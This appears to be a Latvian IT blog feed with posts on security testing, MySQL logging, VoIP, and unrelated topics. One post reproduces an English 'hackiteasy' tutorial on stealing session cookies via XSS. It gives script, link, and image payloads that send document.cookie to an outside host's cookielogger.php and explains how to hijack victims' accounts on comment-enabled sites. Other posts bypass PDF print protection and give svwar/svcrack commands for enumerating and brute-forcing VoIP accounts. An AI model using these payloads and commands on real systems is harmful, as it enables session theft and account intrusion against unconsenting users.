IT sviestapika » How to

Kā izdrukāt aizsargātu (no drukāšanas) pdf failu vai man ir tiesības uz visu..

Kaspars — Sun, 29 Jan 2012 13:55:30 +0000

Materiāls paredzēts tikai informatīviem mērķiem.
Populārzinātniskām vajadzībām bija nepieciešams drukātā veidā iegūt .pdf materiālu, kurš tika veidots kā SECURED PDF.
Ilgi nebija jāgūglē un rezultāts bija vienkāršs.

Vienīgā atšķirība no apraksta – noradītajā vietā šo programmu nevarēja vairs atrast. Bija jāuzstāda jaunāka – 5.0 versija no šejienes.

I had couple of instances where I wanted to print PDF documents but couldn’t do so since the print option was disabled. Tried many ways, searched in the web but no help until the other day to my surprise I got this tool called GSView.

Using GSView we can print PDF documents even though the printing option is disabled. But to use GSView we also need to install another tool called Ghostscript. You can download these tools from:
Ghostscript

http://pages.cs.wisc.edu/~ghost/doc/AFPL/get851.htm

GSView

http://pages.cs.wisc.edu/~ghost/gsview/get47.htm

How to do use this tool:
• Download and install Ghostscript
• Download, Install and run GSView
• Open the GSView Tool and open the PDF document you can’t print.
• Go to File -> Print as you normally would.
I tried this tool and it worked for me.

Kā nodemonstrēt XSS ievainojamību

Kaspars — Sat, 21 Jan 2012 16:02:35 +0000

Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot autora izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma.

Otrs veids ir izmantot šo pieeju.

Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot šo piemēru:

script>
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);

/script>

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user’s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target’s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:

script type=”text/javascript” language=”Java script”>// document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
// ]]>
/script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:

a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”>Click here!

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:

img src=”URL OF THE IMAGE” alt=”" />

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site–>open cookie editor–>Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don’t forget to comment if you like my post.
by hackiteasy

WEB aplikāciju testēšanas rīku salīdzinājums

Kaspars — Mon, 28 Nov 2011 09:23:31 +0000

Internetā ir pieejams WAVSEP (Web Application Vulnerability Scanner Evaluation Project) projekts, kurš izmantojot dažādus scenārijus salīdzina aplikāciju testēšanas rīkus.

Tiek testēts izmantojot šādus testus:

Project WAVSEP currently consists of the following test cases:

64 Reflected XSS test cases (32 GET cases, 32 POST cases -> 66 total vulnerabilities)

130 SQL Injection test cases, most of them implemented for MySQL & MSSQL (65 GET cases, 65 POST Vases -> 136 total vulnerabilities)

o The list of test cases includes vulnerable pages that respond with 500 HTTP errors, 200 HTTP Responses with erroneous text, 200 HTTP Responses with differentiation or completely identical 200 HTTP responses.

o 80 out of 136 cases are simple SQL injection test cases (500 & 200 erroneous HTTP responses), and 56 are Blind SQL Injection test cases (valid and identical 200 HTTP responses).

7 different categories of false positive Reflected XSS vulnerabilities (GET OR POST).

10 different categories of false positive SQL Injection vulnerabilities (GET OR POST)

Projekts tiek hostēts iekš googles un vairāk par to var lasīt izstrādātāja blogā.

Principā ir laiks pārvērtēt izmantotos rīkus.

Kādu laiku atpakaļ pats testēju vairākus atvērtā tipa rīkus izmantojot vienkāršu scenāriju- uzstādīju vairākas vecas wordpress un joomla versijas ar zināmiem ievainojumiem. Diemžēl rezultāts mani apbēdināja, jo bieži rīki nespēja atrast pat dažas ļoti vienkārša XSS ievainojamības.

Windows 8 izmantojot Vmware player

Kaspars — Fri, 07 Oct 2011 06:14:26 +0000

Kā to izdarīt ir aprakstīts te.

Lai uzinstalētu Windows8 ar Vmware player 3 nepietiek. Ir nepieciešama 4 versija, kuru diemžēl atsevišķi nolādēt nevar. Ir jāuzstāda trial versija Vmware Workstation, kura uzinstalē arī Vmwares player 4 versiju.

Pirmais iespaids ar Windows 8 tāds interesants, XP galīgi nav līdzīgs

MySql SQL vaicājumu monitorings

Kaspars — Wed, 14 Sep 2011 10:18:23 +0000

Dažreiz rodas nepieciešamība paskatīties kādus tieši vaicājumus konkrēta sistēma veic datubāzei.
To pavisam vienkārši var izdarīt MySql konfigurācijas failā iespējojot SQL attēlošanu.
/etc/msql/my.cnf failā atrodam un atspējojam:
general_log_file = /var/log/mysql/mysql.log
general_log =1

//turpat var ieslēgt arī logot tikai vaicājumus, kuri izpildās ilgi
Lai izmaiņas stātos spēkā ir jārestartē MySql:
restart mysql
un skatāmies rezultātu:
tail –f /var/log/mysql/mysql.log
Wordpress sākumlapas attēlošanai veic aptuveni šādus SQL pieprasījumus:

Otrs variants, kā paskatīties SQL, bet neveicot MySql restartu ir mysql konsolē ievadīt:
mysql> SET GLOBAL general_log = ‘ON’;
Query OK, 0 rows affected (0.00 sec)

Tikai tad SQL pieprasījumi tiek ierakstīti citā failā:
tail –f /var/log/mysql/bt.log

Ja ir kāda neskaidrība, kas ir ieslēgts un kurā failā kas tiek rakstīts:
Apskatīt iestatītos logošamans parametrus var:
mysql>show variables like ‘%log%’;

!Jāatceras, ka pati logošana atstāj būtisku iespaidu uz veiktspēju.

Ar grafiskā procesora palīdzību paroles var uzlauzt daudz ātrāk

Kaspars — Fri, 02 Sep 2011 05:52:51 +0000

Diezgan biedējoši- tam, kam agrāk vajadzēja 43 gadus, tagad pietiek ar 48 dienām bez lielas piepūles.
Pati pieeja nav jauna, bet gribēju padalīties ar labu rakstu, kur autors detalizētāki ir papētījis šo jautājumu. Ir vērts izlasīt.
Un vēl viena cilvēka pētījums.
Es gan nepiekrītu abiem autoriem, ka paroles sākot no 10 simboliem ir drošībā, jo slodzi var sadalīt un pateicoties mākoņdatošanas pakalpojumiem vajag tikai noīrēt vairāk dzelžu.
Šis gan attiecas uz paroļu minēšanu, kura padodas brute-force uzbrukumam.

Laika un sevis vadība

Kaspars — Mon, 08 Aug 2011 03:59:32 +0000

Interesants video ir ievietots http://web.hc.lv/motivacija-idejas/raksti/laika-menedzments/

kuru var klausīties darot ko paralēli, piemēram, esot ceļā vai tīrot māju.

Galvenās atziņas:

Pie viena darba jāstrādā nepārtraukti- vismaz 2h. Vairāku darbu darīšana nav efektīva.
Jāievēro sava ķermeņa bioritms- katram ir savs produktīvākais laiks.
Jāizveido svarīgo un nepieciešamo darbu rutīna- tie jāveic regulāri.
Vienmēr ir jāieplāno laiks atpūtai, kuras laikā pilnībā var atslēgties no darba jautājumiem.

Zelta vārdi:

Laiku pārvaldīt nav iespējams, bet varam padarīt sevi efektīvāku.

VID datucentru problēma un DEAC neveiksmīga PR kampaņa

Kaspars — Fri, 05 Aug 2011 07:08:17 +0000

Pārlasīju mēdijos publicētos DEAC rakstus par VID datu centra dīkstāvi elektrības pārtraukuma rezultātā.

Personīgi nepazīstu nevienu VID IT pārstāvi, bet manuprāt jocīgi (neticami) izklausījās Gailīša paziņojums -”VID nerēķinās ar riskiem”, jo:

1. Valsts informācijas sistēmu likums nosaka, ka riski ir jāizvērtē (negribas ticēt, ka šo punktu kāds ignorē);

2. Jebkura biznesa uzdevums nav izslēgt pilnīgi visus riskus, bet sabalansēt to iestāšanās ietekmes zaudējumus pret nepieciešamām investīcijām to novēršanā.

Risku novērtēšanas piemērs, kurš uzreiz nāk prātā:

Risks- elektrības pārtraukuma gadījumā ģeneratora jauda neapmierina DC nepieciešamo.

Riska iestāšanās varbūtība – 1 x gadā.

Riska ietekme – informācijas sistēma nav pieejama līdz elektrības padeve atjaunojas (vidēji 4h).

Riska novēršanas scenārijs- iegādāties jaudīgāku ģeneratoru – 200 000 Ls

Piedāvātais risku mazinošais pasākums bez ģeneratoru iegādes- atslēgt mazāk svarīgus serverus iegūstot jaudu kritiskākiem resursiem vai arī laicīgi veikt drošu sistēmas izslēgšanu neapdraudot datu integritāti.

Augstākminētais piemērs ir mans pieņēmums (uzskatu vismaz 90% korekts), bet tas labi ilustrē, ka ne vienmēr ir izdevīgi novērst visus riskus. Jāņem vērā to, kas vienam ir nepieņemams risks, tas otram ir pieņemams, piemēram, bankas neriskēs 200 000 Ls dēļ ar risku- Internetbanka nav pieejama (jo zaudējumi būtu daudz lielāki), bet vai VID šāds risks ir tik būtisks – nedomāju.

Jāatceras arī tas, ka VID IT budžets veidojas no mūsu nodokļiem, tāpēc katram ir sev jāatbild – vai es maksātu X latus par VID IT 4h dīkstāves riska mazināšanu viena gada laikā.

PS. Pēc šī DEAC raksta izskatās, ka zaudētāji ir tikai pats DEAC, jo palasot komentārus visi saprot, ka tas ir tikai PR, kā arī atgādina cilvēkiem par paša DEAC problēmām (vairākas dīkstāves un interneta pieslēguma pārtraukumus).

WordPress update crash

Kaspars — Sun, 26 Jun 2011 19:16:41 +0000

Problēma: Atjaunojot wordpress izmantojot automātisko atjaunināšanas iespēju tas regulāri beidzass ar kļūdu. Šo problēmu atrisina plugins ftp-upgrade-fix.1.0 Related posts: Atjaunojam wordpress Draugiem.lv pase priekš wordpress Paplašinām wordpress iespējas Related posts:

VoIP stress tests

Kaspars — Tue, 21 Jun 2011 19:41:45 +0000

Man palūdza veikt vienas VoIP platformas autentifikācijas stress testu, jo vajadzēja notestēt jauno DOS aizsardzības mehānismu.
Pēc daudzu materiālu izlasīšanas un rīku testēšanas konstatēju, ka man vislabāk patīk:
svmap.py – VoIP PBX meklēšanai (man nebija nepieciešams, jo pamat info jau bija zināma. Bet ir noderīgas rīks, ja grib uzzināt kāds tieši PBX slēpjas (taisa fingerprint));
svwar.py – numuru meklēšanai (sūta gan invite, gan register pieprasījumus);
(no šī rīka labums bija mazs, ja VoIP bija ieslēgts alwaysauthreject, kā rezultātā uz visiem pieprasījumiem tika saņemta vienāda atbilde)
svcrack.py – paroles brote-force minēšanai.

Sintakse:
./svwar.py -e100-400 192.168.1.104
./svcrack.py -u200 -d wordlist.txt 192.168.1.104

Viss pārējais ir izdomas un skriptu jautājums.

Nelieli raksti par VoIP no Back-track, sysadmin.net, te, asterix hacking and security, asterix krieviski .
Programmu uzskaitījums
Nedaudz par pašu SIP protokolu

!!!Atcerieties – Bez resursa turētāja atļaujas ir aizliekts veikt jebkādus testus!!!
Anonimitāte internetā ir mīts. Viss pārējais ir laika jautājums.

Kā aizsargāties?
Vienmēr izmantot sarežģītas paroles- vienkāršas paroles ar svcrack tiek uzlauztas dažu sekunžu laikā;
Ieslēgt alwaysauthreject, lai nevar atklāt VOIP numurus un līdz ar to piemeklēt paroli;
Ja iespējams limitēt pieeju PBX;
Izmantot vairāku līmeņu arhitektūru;
Aizliegt pārējo portu izmantošanu;
Ieviest pret DOS un DDOS aizsardzību, jo kā izrādījās ar autentifikācijas pieprasījumiem var vienkārši uzkarināt PBX;
Un prasīt google secure VoIP un hack VoIP.